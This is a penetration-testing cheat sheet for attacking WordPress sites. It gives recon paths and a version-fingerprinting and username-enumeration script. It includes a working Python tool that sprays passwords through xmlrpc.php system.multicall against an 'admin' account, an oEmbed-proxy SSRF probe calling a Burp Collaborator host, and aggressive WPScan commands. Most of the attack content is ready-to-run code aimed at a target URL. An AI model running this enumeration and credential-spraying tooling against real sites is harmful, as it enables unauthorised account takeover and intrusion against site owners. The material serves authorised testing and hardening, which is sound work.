🔷 WordPress

Manual

Information Gathering

  • license.txt, readme.html (readme.html prints the installed WordPress version; license.txt only confirms a WordPress install)

  • wp-activate.php

  • wp-content/uploads/

  • wp-includes/

  • wp-config.php

# get wordpress version from the <meta name="generator"> tag (empty if the site strips the version or the tag)
curl -s https://victim.com/ | grep 'content="WordPress'

Users / IP

Check for usernames (id, slug, display name) : /wp-json/wp/v2/users (or /?rest_route=/wp/v2/users when pretty permalinks are off); only users with published posts are listed

Could leak internal hostnames or IP addresses in guid/link fields : /wp-json/wp/v2/pages

# get author name = potential user: ?author=N redirects to /author/<slug>/, so read the Location header and increment N
curl -s -I -X GET http://blog.example.com/?author=1
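The information-gathering and user-enumeration checks above, as a script. This is an added example for this cheat sheet, not the page's own tooling: the parsing functions run offline against the constructed sample responses embedded below, and the fetch helpers run the same checks live against a base URL you pass on the command line (the https://blog.example.com target is hypothetical).

```python
"""WordPress version fingerprinting and user enumeration (generator tag, readme.html,
/wp-json/wp/v2/users, ?author=N redirect). Added example; sample responses are constructed."""
import json
import re
import sys
import urllib.error
import urllib.request

# <meta name="generator" content="WordPress 6.4.2" /> ; hardened sites strip the number or the tag
GENERATOR_RE = re.compile(r'<meta[^>]+name="generator"[^>]+content="WordPress\s*([\d.]*)"', re.I)
# readme.html carries "Version X.Y.Z" right under the logo
README_RE = re.compile(r'Version\s+([\d.]+)', re.I)
# ?author=N redirects to /author/<slug>/ ; the slug is the login name unless the user changed it
AUTHOR_RE = re.compile(r'/author/([^/?#]+)')


def version_from_generator(html):
    """Version string from the generator tag, '' if the tag has no version, None if no tag."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def version_from_readme(html):
    m = README_RE.search(html)
    return m.group(1) if m else None


def users_from_rest(body):
    """Parse /wp-json/wp/v2/users into (id, slug, display name); an error object (dict) yields []."""
    data = json.loads(body)
    if not isinstance(data, list):
        return []
    return [(u["id"], u.get("slug"), u.get("name")) for u in data]


def username_from_author_redirect(location):
    """Slug from the Location header of the ?author=N redirect, or None when there is no redirect."""
    if not location:
        return None
    m = AUTHOR_RE.search(location)
    return m.group(1) if m else None


# --- constructed sample responses (not captured from a real site) ---
SAMPLE_HOME = '<html><head><meta charset="utf-8"><meta name="generator" content="WordPress 6.4.2" /></head></html>'
SAMPLE_README = '<h1 id="logo"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /><br /> Version 6.4.2</h1>'
SAMPLE_USERS = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://blog.example.com/author/admin/"},
    {"id": 2, "name": "Editor", "slug": "editor", "link": "https://blog.example.com/author/editor/"},
])
SAMPLE_LOCATION = "https://blog.example.com/author/admin/"


# --- live helpers (hypothetical target; only used when run as a script) ---
class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 3xx as HTTPError so the Location header can be read


def _get(url, follow=True):
    opener = urllib.request.build_opener() if follow else urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=10) as r:
            return r.status, r.headers, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers, e.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return 0, {}, ""


def enumerate_site(base):
    base = base.rstrip("/")
    _, _, home = _get(base + "/")
    _, _, readme = _get(base + "/readme.html")
    _, _, users = _get(base + "/wp-json/wp/v2/users")
    found = {"generator": version_from_generator(home), "readme": version_from_readme(readme)}
    try:
        found["rest_users"] = users_from_rest(users)
    except ValueError:  # endpoint blocked or not JSON
        found["rest_users"] = []
    found["author_redirects"] = {}
    for n in range(1, 6):  # first few author IDs are enough to confirm the leak
        _, hdrs, _ = _get(base + "/?author=%d" % n, follow=False)
        slug = username_from_author_redirect(hdrs.get("Location"))
        if slug:
            found["author_redirects"][n] = slug
    return found


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "https://blog.example.com"
    print(json.dumps(enumerate_site(target), indent=2))
```

The author-redirect probe deliberately does not follow redirects: the username lives in the Location header, which a redirect-following client would throw away. A generator tag that reads just "WordPress" is still a positive fingerprint, so the parser distinguishes "tag present, version hidden" (empty string) from "no tag" (None).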

xmlrpc.php

Active (a POST with system.listMethods returns a methodResponse instead of an error)

Credential brute-force via system.multicall (many login attempts in one request, bypassing rate limits or captchas on wp-login.php), or DoS / blind SSRF via pingback.ping against an arbitrary target URL
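The xmlrpc.php checks just described, as code: confirm the endpoint is live and exposes system.multicall, then pack one wp.getUsersBlogs login attempt per password guess into a single request and read back which guesses were accepted. This is an added example, not the page's own code; the target URL, username and wordlist are hypothetical, and the responses used for the offline checks are constructed with xmlrpc.client.dumps in the shape WordPress returns (a fault struct per rejected login, a one-element list wrapping the blog list per accepted one).

```python
"""xmlrpc.php: liveness check and system.multicall password spraying.
Added example; the sample responses below are constructed, not captured."""
import urllib.request
import xmlrpc.client

AUTH_METHOD = "wp.getUsersBlogs"  # cheapest method that requires valid credentials


def build_multicall(username, passwords):
    """One methodCall body carrying one login attempt per password guess."""
    calls = [{"methodName": AUTH_METHOD, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(response_xml, passwords):
    """Return the guesses that logged in: a dict (faultCode/faultString) means rejected,
    anything else is the [result] wrapper WordPress puts around a successful call."""
    try:
        (results,), _ = xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault:  # whole multicall refused (e.g. multicall disabled by a plugin)
        return []
    return [pw for pw, item in zip(passwords, results) if not isinstance(item, dict)]


def xmlrpc_enabled(list_methods_response):
    """(endpoint live, system.multicall exposed) from the raw system.listMethods response."""
    try:
        (methods,), _ = xmlrpc.client.loads(list_methods_response)
    except Exception:  # HTML error page, "accepts POST requests only", a Fault, etc.
        return (False, False)
    return (True, "system.multicall" in methods)


# --- constructed sample responses ---
SAMPLE_LIST_METHODS = xmlrpc.client.dumps(
    (["system.multicall", "system.listMethods", "wp.getUsersBlogs", "pingback.ping"],), methodresponse=True)
SAMPLE_GUESSES = ["Winter2024!", "password"]
SAMPLE_MULTICALL = xmlrpc.client.dumps(([
    [[{"blogid": "1", "url": "http://blog.example.com/", "isAdmin": True}]],  # guess 1 accepted
    {"faultCode": 403, "faultString": "Incorrect username or password."},    # guess 2 rejected
],), methodresponse=True)


# --- live helpers (hypothetical target; only used when run as a script) ---
def post_xmlrpc(url, body):
    req = urllib.request.Request(
        url, data=body.encode(), headers={"Content-Type": "text/xml", "User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=15) as r:
        return r.read().decode("utf-8", "replace")


def spray(url, username, wordlist, batch=20):
    hits = []
    for i in range(0, len(wordlist), batch):
        chunk = wordlist[i:i + batch]
        hits += parse_multicall(post_xmlrpc(url, build_multicall(username, chunk)), chunk)
    return hits


if __name__ == "__main__":
    target = "https://blog.example.com/xmlrpc.php"  # hypothetical
    live, multi = xmlrpc_enabled(post_xmlrpc(target, xmlrpc.client.dumps((), methodname="system.listMethods")))
    print("xmlrpc live:", live, "multicall:", multi)
    if multi:
        print("valid passwords:", spray(target, "admin", ["Winter2024!", "password", "admin123"]))
```

Caveat for the amplification: current WordPress flags the request after the first failed login and rejects every later login in the same multicall, so a batch only confirms guesses that precede the first wrong one; the endpoint is still worth using because it sidesteps protections that only watch wp-login.php. Keep batches small so a single success is not masked by an earlier failure.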

Exploit

SSRF

/wp-json/oembed/1.0/proxy fetches the supplied url server-side (oEmbed discovery). It requires an authenticated user with the edit_posts capability (Contributor or above); unauthenticated requests get 401. WordPress performs the fetch with wp_safe_remote_get, which refuses loopback and private address ranges, so expect an out-of-band callback rather than access to internal hosts.

Try (as an authenticated user, e.g. with a REST nonce or an application password)

https://wordpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net

WPScan

WPScan is a WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites. The --api-token flag fetches vulnerability data from the WPScan API; without it the scan only detects components and versions.

Commands - with API

Default

# Enumerate plugins with known vulnerabilities (-e vp); mixed detection = passive page inspection plus active path probing
wpscan --url $target -e vp --plugins-detection mixed --api-token $YOUR_TOKEN

# Enumerate all plugins in the WPScan database (-e ap); probes every known plugin path, so it is slow and noisy
wpscan --url $target -e ap --plugins-detection mixed --api-token $YOUR_TOKEN

Private Commands - with API

# Deeper scan: aggressive detection sends many more requests; --ignore-main-redirect keeps scanning the given URL even if it redirects elsewhere
wpscan --url $target --ignore-main-redirect --detection-mode aggressive --plugins-detection mixed --api-token $YOUR_TOKEN
